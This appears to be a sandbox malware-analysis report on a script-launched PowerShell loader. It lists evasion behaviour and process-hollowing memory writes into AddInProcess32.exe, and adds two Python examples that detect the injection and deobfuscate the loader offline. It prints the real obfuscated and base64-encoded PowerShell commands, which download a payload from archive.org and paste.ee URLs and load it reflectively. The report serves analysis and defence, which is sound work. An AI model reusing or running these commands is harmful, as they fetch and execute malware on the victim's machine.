            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 7_2_0040F7A7 Sleep,ExitProcess
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD3477A4C9 sldt word ptr fs:[eax]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,7_2_0041A748
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (2 identical entries)
            Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1699
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1655
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3860
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5981
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Window / User API: threadDelayed 5622
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Window / User API: threadDelayed 3785
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Window / User API: foregroundWindowGot 1751
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5424 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6068 Thread sleep count: 3860 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4976 Thread sleep count: 5981 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1048 Thread sleep time: -20291418481080494s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6504 Thread sleep count: 201 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6504 Thread sleep time: -100500s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2276 Thread sleep count: 5622 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2276 Thread sleep time: -16866000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2276 Thread sleep count: 3785 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2276 Thread sleep time: -11355000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 7_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 7_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 7_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 7_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 7_2_0044E879 FindFirstFileExA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 7_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 7_2_0040783C FindFirstFileW,FindNextFileW
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 7_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 7_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 7_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 7_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (2 identical entries)
            Source: powershell.exe, 00000004.00000002.2294500066.000001B0A7BC6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: AddInProcess32.exe, 00000007.00000002.3412298502.0000000000B68000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe API call chain: ExitProcess graph end node (graph_7-48774)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 7_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 7_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 7_2_004432B5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 7_2_00412077 GetProcessHeap,HeapFree
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 7_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 7_2_00434B47 SetUnhandledExceptionFilter
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 7_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 7_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 459000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 471000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 477000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 478000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 479000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47E000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 93A008
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 7_2_004120F7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 7_2_00419627 mouse_event
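The `Memory written` entries above show powershell.exe writing an `MZ` header (`4D5A`) into the AddInProcess32.exe process it had just created, at 0x400000, followed by writes at what look like section offsets (0x401000, 0x459000, ...). That is the footprint of a RunPE-style injection, which matches the `RunPE.Home` type and the `AddInProcess32` argument in the decoded PowerShell. The following Python is an added example, not part of the Joe Sandbox report: it correlates such entries into a single finding by rebuilding the parent chain from `Process created` lines and flagging a process that was spawned from a script-host chain and then received an `MZ` header at its image base from its own parent. The event lines are constructed to mirror this report's format, and the set of script hosts (`wscript.exe`, `cscript.exe`, `mshta.exe`) is an assumption of the example.

```python
import re
from collections import defaultdict

# Constructed event lines that mirror the "Process created" / "Memory written"
# entries of this report. The last line is a benign control that must not match.
EVENTS = [
    r"Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000",
    r"Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\notepad.exe",
]

# Assumed list of script hosts whose descendants we treat as suspicious writers.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}

CREATE_RE = re.compile(r"^Source: (?P<parent>.+?) Process created: (?P<child>\S+)")
WRITE_RE = re.compile(
    r"^Source: (?P<writer>.+?) Memory written: (?P<target>\S+) base: (?P<base>[0-9A-Fa-f]+)"
    r"(?: value starts with: (?P<magic>[0-9A-Fa-f]+))?"
)


def image_name(path):
    """Lower-cased file name of a Windows path (the report carries no PIDs)."""
    return path.rsplit("\\", 1)[-1].lower()


def parse_events(lines):
    """Return (child -> set of parents) and a list of (writer, target, base, magic)."""
    parents = defaultdict(set)
    writes = []
    for line in lines:
        m = CREATE_RE.match(line)
        if m:
            parents[image_name(m["child"])].add(image_name(m["parent"]))
            continue
        m = WRITE_RE.match(line)
        if m:
            writes.append((image_name(m["writer"]), image_name(m["target"]),
                           int(m["base"], 16), (m["magic"] or "").upper()))
    return parents, writes


def descends_from_script_host(proc, parents, seen=None):
    """Walk the parent chain; 'seen' guards against powershell -> powershell loops."""
    seen = set() if seen is None else seen
    for parent in parents.get(proc, ()):
        if parent in seen:
            continue
        seen.add(parent)
        if parent in SCRIPT_HOSTS or descends_from_script_host(parent, parents, seen):
            return True
    return False


def find_hollowing(lines):
    """Flag: MZ header written by a process into a child it created, where the
    writer itself descends from a script host."""
    parents, writes = parse_events(lines)
    findings = []
    for writer, target, base, magic in writes:
        if not magic.startswith("4D5A"):
            continue                      # only a PE header at the write address counts
        if writer not in parents.get(target, ()):
            continue                      # the writer must be the parent that spawned the target
        if not descends_from_script_host(writer, parents):
            continue
        findings.append({"writer": writer, "target": target, "image_base": hex(base)})
    return findings


if __name__ == "__main__":
    for hit in find_hollowing(EVENTS):
        print(hit)
```

On real endpoint telemetry (for example Sysmon process-create and remote-thread/memory events) the same correlation should key on process IDs rather than image names; names are used here only because the report lists none.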
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5ID0gWycrJ1JlZmxlY3Rpb24uQXNzZW1ibHldJysnOjonKydMb2FkKCcrJ2s4ZicrJ2JpbmFyeUNvbnQnKydlbnQpO2s4ZicrJ3R5cGUgJysnPScrJyBrOGZhc3NlbScrJ2JsJysneS4nKydHZXRUeXAnKydlJysnKGM5JysnSVJ1blBFLkgnKydvbWVjOUkpOycrJ2s4ZicrJ21ldGhvZCA9ICcrJ2snKyc4ZnR5cGUnKycuR2V0TWV0JysnaG9kKGM5SVZBSWM5SSk7JysnazhmbWV0aG9kLkludicrJ29rZShrOGZudWxsLCcrJyBbb2InKydqZScrJ2N0W11dQChjOUkwL29Tc2tXL2QvZWUuJysnZScrJ3RzYXAvLycrJzpzcHR0aGM5SSAsJysnIGM5JysnSWQnKydlcycrJ2F0aXYnKydhZCcrJ29jOUknKycgJysnLCBjOUknKydkZXNhdGknKyd2YWRvYzknKydJICwgYzknKydJZGVzJysnYXRpdmFkb2M5SSxjJysnOUlBZGRJblByb2Nlc3MzMmM5SSxjOUljOUkpJysnKScpICAtY1JFcGxBQ0UgKFtDSGFSXTk5K1tDSGFSXTU3K1tDSGFSXTczKSxbQ0hhUl0zOSAgLXJFcExBY0UnazhmJyxbQ0hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" (3 identical entries)
            Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = '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';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ". ((get-variable '*mdr*').name[3,11,2]-join'') ((('k8'+'fu'+'r'+'l = c9ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/deta'+'hnotev.txtc'+'9i;k8fb'+'as'+'e64cont'+'ent = '+'(n'+'ew-o'+'bject'+' system'+'.net.webclient).'+'download'+'st'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryc'+'ontent ='+' ['+'sy'+'stem.c'+'onv'+'e'+'rt]:'+':frombase'+'64string(k8fbase64c'+'ont'+'ent'+');k8fassembly = ['+'reflection.assembly]'+'::'+'load('+'k8f'+'binarycont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'gettyp'+'e'+'(c9'+'irunpe.h'+'omec9i);'+'k8f'+'method = '+'k'+'8ftype'+'.getmet'+'hod(c9ivaic9i);'+'k8fmethod.inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9i0/osskw/d/ee.'+'e'+'tsap//'+':sptthc9i ,'+' c9'+'id'+'es'+'ativ'+'ad'+'oc9i'+' '+', c9i'+'desati'+'vadoc9'+'i , c9'+'ides'+'ativadoc9i,c'+'9iaddinprocess32c9i,c9ic9i)'+')') -creplace ([char]99+[char]57+[char]73),[char]39 -replace'k8f',[char]36) )"
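The second-stage command line above hides its script behind three layers: an `iex` alias built from `(Get-Variable '*MDr*').Name[3,11,2]` (in a default session the wildcard matches the automatic variable `MaximumDriveCount`, whose characters 3, 11 and 2 are `i`, `e`, `x`), a script assembled from dozens of `'..'+'..'` fragments, and two replace operators that turn the marker `c9I` ([CHaR]99+[CHaR]57+[CHaR]73) into a single quote ([CHaR]39) and `k8f` into `$` ([CHaR]36). The following Python is an added example, not part of the Joe Sandbox report: it performs those transformations offline on the fragment expression transcribed from the command line and pulls out the indicators (download URL, loader type and method, `Invoke` arguments, injection target). Reading the first `Invoke` argument as a reversed URL is an inference from its shape (`...//:sptth`); nothing here is downloaded or executed.

```python
import re

# Fragment expression transcribed from the second powershell.exe command line in
# this report (the operand of the -cREplACE / -rEpLAcE chain). It is the only input;
# the example performs no network access.
FRAGMENT_EXPR = (
    "'k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'"
    "+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'"
    "+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'"
    "+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('"
    "+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'"
    "+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'"
    "+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'"
    "+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')'"
)


def join_fragments(expr):
    """Collapse a PowerShell 'a'+'b'+'c' concatenation into one string.
    The fragments never contain a quote themselves (the script uses the c9I
    marker for that), so a simple quoted-string scan is enough."""
    return "".join(re.findall(r"'([^']*)'", expr))


def undo_replaces(text):
    """Apply the command line's two replace operators, in order:
    -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39  -> case-sensitive  'c9I' => "'"
    -rEpLAcE 'k8f',[CHaR]36                          -> case-insensitive 'k8f' => '$'
    """
    quote_marker = chr(99) + chr(57) + chr(73)
    text = text.replace(quote_marker, chr(39))
    return re.sub("k8f", lambda _m: chr(36), text, flags=re.IGNORECASE)


def resolve_alias(variable_name="MaximumDriveCount", indices=(3, 11, 2)):
    """Emulate (Get-Variable '*MDr*').Name[3,11,2] -join '' ; yields 'iex'."""
    return "".join(variable_name[i] for i in indices)


def deobfuscate(expr):
    """Full pipeline: fragments -> plain text -> markers restored."""
    return undo_replaces(join_fragments(expr))


def extract_iocs(script):
    """Pull the indicators a responder needs out of the recovered script."""
    urls = re.findall(r"https?://[^\s'\"]+", script)
    loader_type = re.search(r"GetType\('([^']*)'\)", script).group(1)
    loader_method = re.search(r"GetMethod\('([^']*)'\)", script).group(1)
    arg_blob = re.search(r"Invoke\(\$null,\s*\[object\[\]\]@\((.*)\)\)", script).group(1)
    args = [a.strip().strip("'") for a in arg_blob.split(",")]
    first = args[0]
    # The first argument is stored back-to-front; reverse it when that yields a URL.
    payload_url = first[::-1] if first[::-1].startswith("http") else first
    return {
        "stage2_url": urls[0],
        "loader_type": loader_type,
        "loader_method": loader_method,
        "invoke_args": args,
        "payload_url": payload_url,
        "injection_target": args[4] if len(args) > 4 else None,
    }


if __name__ == "__main__":
    recovered = deobfuscate(FRAGMENT_EXPR)
    print("invoked via:", resolve_alias())
    print(recovered)
    for key, value in extract_iocs(recovered).items():
        print(f"{key}: {value}")
```

The recovered script downloads a Base64 text from the archive.org URL, loads it with `[Reflection.Assembly]::Load`, and calls `RunPE.Home.VAI` with the reversed paste.ee URL and `AddInProcess32` as arguments, which is consistent with the `Memory written` entries into AddInProcess32.exe listed above.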
